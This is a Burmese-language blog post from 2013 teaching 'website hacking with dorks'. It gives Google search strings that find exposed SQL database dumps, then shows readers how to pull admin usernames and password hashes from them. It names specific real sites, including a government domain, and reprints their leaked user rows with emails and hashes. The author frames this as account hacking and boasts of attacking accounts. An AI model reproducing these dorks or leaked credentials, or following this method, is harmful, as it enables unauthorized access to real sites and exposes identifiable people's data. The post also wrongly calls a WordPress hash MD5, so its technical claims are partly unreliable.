Everything About IT Notes

Friday, May 10, 2013

Posted by Ko San Lwin at 12:58 AM

Website Hacking With Dork !!!



http://sphotos-b.ak.fbcdn.net/hphotos-ak-snc6/181432_180990552055970_997715085_n.jpg



Dork ေတြကိုသုံးျပီး Accounts ေတြ Website ေတြကို ဘယ္လုိ ပာက္ၾကမလဲ.. ဆုိတာေလးေပ့ါ... အားလုံးဘဲ စိတ္၀င္စားလိမ့္မယ္လုိ ့ကြ်န္ေတာ္ ေမွ်ာ္လင့္ပါတယ္..

Hacking ပုိင္းကို ေလ့လာလုိ ့ နည္းနည္းေလး ၀ါေလးရလာပီဆုိ ရင္

အမ်ားစုက Dork ဆုိ တာၾကီးကို ခေလး အထာ (ခေလး အကြက္ေတြလု ိ့ ထင္ထားၾကပါ).. တကယ္တန္းေတာ့ အားလုံးက သူ ့ေနရာနဲ ့သူပါ..

Dorking ပုိင္း စိတ္၀င္စားလုိ ့စေလ့လာမယ္ဆုိရင္ေတာ့ လုိအပ္တာေလးကေတာ့...

[+] 1. ေတြးေတာ တတ္တဲ့ ဦးေႏွာက္ရွိရမယ္..

[+] 2. ျဖတ္ထုိးဥာဏ္ ေကာင္းရမယ္..

[+] 3. Hacking နဲ ့ပတ္သက္ျပီး အေတြ ့အၾကံဳ ရွိရပါမယ္...


ဒီ ၃ ခ်က္သာ သင့္မွာရွိေနရင္ Dork ေတြကို ကုိယ္ပုိင္ ဖန္တီးနုိင္မွာျဖစ္သလုိ...

ခက္ခဲမယ္ ထင္တဲ့ အရာေတြက လြယ္ကူသြားေစတတ္ပါတယ္.. (အျမဲေတာ့မပာုတ္ပါဘူး အမ်ားစု မွာေပ့ါ)

ကဲေကာင္းပီ... ကြ်န္ေတာ္ FB Group ေလးတစ္ခုမွာ ညီကို ေတြကို Hacking ဆုိင္ရာ ဗပာုသုတ ေတြ

ကြ်န္ေတာ္ ေတြ ့ၾကဳံဖူးသမွ် ေတြနဲ ့ကြ်န္ေတာ္ တတ္ထားတဲ့ပညာေလး မေတာက္တစ္ေခါက္ကို ရွဲဖူးပါတယ္.. ဒီအခ်ိန္မွာ ညီေလးတစ္ေယာက္ ၾကိဳးစားပန္းစားပာက္ေနတဲ့ဆုိဒ္တစ္ခုပါ..သူအတြက္ အေတာ္ေလး ခက္ခဲေပမယ့္ ခုနည္းနဲ ့ကြ်န္ေတာ္အတြက္ ၂ မိနစ္ ေလာက္သာၾကာသြားပါတယ္.. Admin , User:Pass ေတြ အလြယ္တကူရခဲ့ပါတယ္..

ဒါက တစ္ပုိင္းပါ.. ေနာက္တစ္ခါ Account ေတြကို လူတစ္ေယာက္နဲ ့ျပိဳင္ျပီး attack လုပ္ဖူးပါတယ္..

ဒီတုန္းကလည္း ကြ်န္ေတာ္ Dork ကုိသာ သုံးသြားတာပါ... ကြ်န္ေတာ္ သူ ့ထက္ အေကာင့္မ်ားမ်ား attack လုပ္နုိင္ဖူးပါတယ္... ဒါေတြကလည္း ခုနည္းကိုသုံးခဲ့ဖူးလုိ ့ပါဘဲ..

ကဲ စရေအာင္ဗ်ာ...

ခုနည္းကိုေတာ့ Website Hacking with dorks (0day) ေလးတစ္ခုလုိ ့ကြ်န္ေတာ္ ယူဆထားတာေလးပါ..

အရင္ဆုံး ဆုိဒ္ေတြရဲ  ့ အက္မင္ User:Pass ေတြကို စလုပ္ၾကတာေပ့ါဗ်ာ..

[+] Dork: ext:sql intext:`wp_users` `user_login`, `user_pass`

ဒီေနရာမွာ ext ဆုိတာက File Extension ဆုိကုိဆုိလုိတာပါ.. အုိေက File Extension ဆုိတာဘာလဲ..

ဥပမာ.. လူအမ်ားသိတဲ့ Dota Game ဖုိင္ဆုိပါေတာ.. ဒါဆုိ သူ ့file extension က exe ပါ..

ဒါမွပာုတ္ NOtepad ဖုိင္ေတြဆုိ သူ file extension က txt ပါ...

ဒီလိုပါဘဲ..

Website အမ်ား စုမွာ.. .sql ဆုိတဲ့ File Extension ေနရာပာာလြန္စြာ အေ၇းပါလွပါတယ္..

ဘာလုိ ့လဲဆုိေတာ့ အဲ့ .sql ဆုိတဲ့ ဖုိင္တစ္ခ်ဳိ ့ပာာ ဆုိဒ္တစ္ခုလုံးကို ထိန္းခ်ဳပ္ထားတဲ့ Admin တစ္ေယာက္ရဲ ့ Data အမ်ားစု သြားေရာက္သုိေလွာင္ထားတဲ့ ေနရာမို ့လုိ ့ပါဘဲ..

Site ရဲ  ့ Administrator User Name : Password ေတြက အစေပ့ါဗ်ာ..

ဒါေပမယ့္ခုနည္း ေတြကေတာ့.. Website တစ္ခုရဲ  ့ Database(DB) ေတြတည္း၀င္ေရာက္ဖူးတဲ့

သူမ်ားအတြက္ ေတာ့ ပုိအဆင္ေျပနုိင္ပါတယ္...

ကဲ ခုနည္းနည္းေလးစလုိက္ရေအာင္ဗ်ာ..

[+] www.google.com ကုိသြားလုိက္ပါ...

[+] ext:sql intext:`wp_users`

ဆုိတာေလးကို ထည့္လုိက္ပါ... အားပါး... ျမင္လားေတာ့မသိဘူးဗ်

...



အားပါး ၾကိုက္တဲ့လင့္တစ္ခုကိုနုိပ္လုိက္ပါ..

ဥပမာေပးရရင္...

[+]Demo

[+] http://asia-spice.co.uk/india.sql

ကဲ သူငယ္ခ်င္းတုိ ့ျမင္ေတြ ့ရာမွာကေတာ့ ဘာေတြမွန္းမသိဘူးဆုိတဲ့ Code ေတြပါ...

ဒါေပမယ့္.. Ctrl+f နုိပ္ျပီး _users လုိ ့ထည့္ရွာလုိက္ရင္ေတြ ့၇မွာျဖစ္ပါတယ္... ေအာက္ကဥပမာ ၾကည့္တာေပ့ါ...

INSERT INTO `wp_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES

(1, 'admin', '$P$BubDNW5YEufyKsP7Qs0yzchz8tk4ml.', 'admin', 'prabal@looogobd.com', '', '2011-02-02 14:22:20', '', 0, 'admin');

So.. So... So... "လဲလဲလဲလဲလဲလဲလဲ"

[+] http://www.asia-spice.co.uk

[+] Admin Page : http://www.asia-spice.co.uk/wp-admin

[+] User :  admin

[+] Pass :  $P$BubDNW5YEufyKsP7Qs0yzchz8tk4ml (MD 5 ေလးေတာ့ျဖည္ေပ့ါဗ်ာ)

ဒါေလးကေတာ့ wordpress ဆုိဒ္ကို လုပ္သြားတာေလးပါ... ...

အုိေက Joomla Website ကိုလည္း လုပ္ၾကည့္ရေအာင္ဗ်ာ.. ေဒါ့ေလး စေရးၾကမယ္..

wordpress ဆုိဒ္ဆုိ wp_users လုိ ့သုံးပါတယ္...

Joomla ဆုိဒ္မွာဆုိရင္ jos_users လုိ ့သုံးပါတယ္.. ဒီေတာ့သင့္ ဦးေႏွာက္ကို အရင္စမ္းသပ္ပါ....

Dork ကုိ သင္ဘယ္လုိ ေရးရမလဲဆုိတာကို... စမ္းသပ္ၾကည့္ပါ.. ျပီးမွ ေအာက္က Dork ကုိၾကည့္ပါ...

[+] Dork : ext:sql intext:`jos_users`

အုိေက ပုံမွန္တုိင္းပါဘဲ.. မိမိ စိတ္ၾကိုက္လင့္တစ္ခုကို ရယူလိုက္ပါ..

ဥပမာေပးရရင္..ေတာ့ ေအာက္ကလင့္ေပ့ါဗ်ာ..

[+] http://www.nape.gov.bd/ssdemo_nape.sql

ဆုိပါေတာ့ Ctrl+f ကုိနုိပ္ျပီး table jos_users လုိ ့ထည့္ရွာလုိက္ပါ..

အားပါးေအာက္ဆုံးနားေလးမွာေတြ ့ေနရပါျပီ...

 ျမင္လားေတာ့မသိဘူးဗ် ...

 INSERT INTO `jos_users` (`id`, `name`, `username`, `email`, `password`, `usertype`, `block`, `sendEmail`, `gid`, `registerDate`, `lastvisitDate`, `activation`, `params`) VALUES
(62, 'Administrator', 'admin', 'abc@yahoo.com', '1c593b301f5b54004f59dec08f966bcb:DDg8EdtaoX2M4ta6zAkkriJcbzBchX5a', 'Super Administrator', 0, 1, 25, '2011-11-30 15:36:33', '2011-12-11 14:37:58', '', 'admin_language=\nlanguage=\neditor=\nhelpsite=\ntimezone=0\n\n'),
(63, 'Shuvo', 'ssshuvo', 'shuvo@yahoo.com', '82bf62a9f84ca409800aafca388ececd:4Etey3jMyOllDVqggYvAmrG9XLShFoHQ', 'Registered', 0, 0, 18, '2011-12-01 10:19:55', '2011-12-01 10:39:43', '96b8a810f2b3a2c3fe34c9938f1453ed', '\n');

အေတာင့္လုိက္ေတြ ထြက္လာပါတယ္..

[+] Demo

[+] http://www.nape.gov.bd

[+] http://www.nape.gov.bd/administrator/

[+] User : abc@yahoo.com / Pass: 1c593b301f5b54004f59dec08f966bcb:DDg8EdtaoX2M4ta6zAkkriJcbzBchX5a (MD5)

[+] User : shuvo@yahoo.com / Pass: 82bf62a9f84ca409800aafca388ececd:4Etey3jMyOllDVqggYvAmrG9XLShFoHQ (MD5)

ကဲ... ျမင္တဲ့အတုိင္းဘဲဗ်ာ.. ခုျပသြားတာက wordpress / Joomla တုိ ့ဘဲျဖစ္ပါတယ္...

ဒါေလးက လူအမ်ားစုသိေတာ့ ဥပမာ ေပးရတာပိုအဆင္ေျပမယ္ထင္လုိ ့ပါ..

တစ္ျခားဆုိဒ္ေတြကိုလည္း အဲ့လုိ ပါဘဲ... သူငယ္ခ်င္းတုိ ့ကို ကြ်န္ေတာ္ေျပာခဲ့သလိုေပ့ါဗ်ာ...

 ဦးေႏွာက္ေပ့ါ အေပၚက အခ်က္သုံးခ်က္ နဲ ့ သာဆုိရင္ မီးပြင့္ထြက္ေအာင္ ပာက္လုိ ့ရပါတယ္...



Web hacking  ပုိင္းေလးျပီးျပီ ဆုိေတာ့ Accounts ေတြကို ပာက္ၾကည့္ရေအာင္ဗ်ာ..

Special G:_   ext:sql intext:`*_users`

:')



အစကေတာ့ Accounts & Website Hacking with dork  ဆုိပီး e-book ေလးေရးေပးမလုိ ့ပါဘဲဗ်ာ..

ကြ်န္ေတာ့ စာအုပ္ေလးကို ညီကို တစ္ခ်ဳိ  ့ကိုေပးဖတ္လုိက္ေတာ့ လုိအပ္ခ်က္ေလးေတြရွိေနလုိ ့ဘေလာ့အေနနဲ ့သာ

 တင္ေပးလုိက္ရပါတယ္ခင္ဗ်ာ...

ေပ်ာ္ရႊင္ပါေစ ကြ်န္ေတာ္လည္း ဆက္လက္ ၾကိဳးစားေနအုံးမွာပါ..

အားေပးၾကပါအုံးလုိ ့ ဖိတ္ေခၚခ်င္ပါတယ္..

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)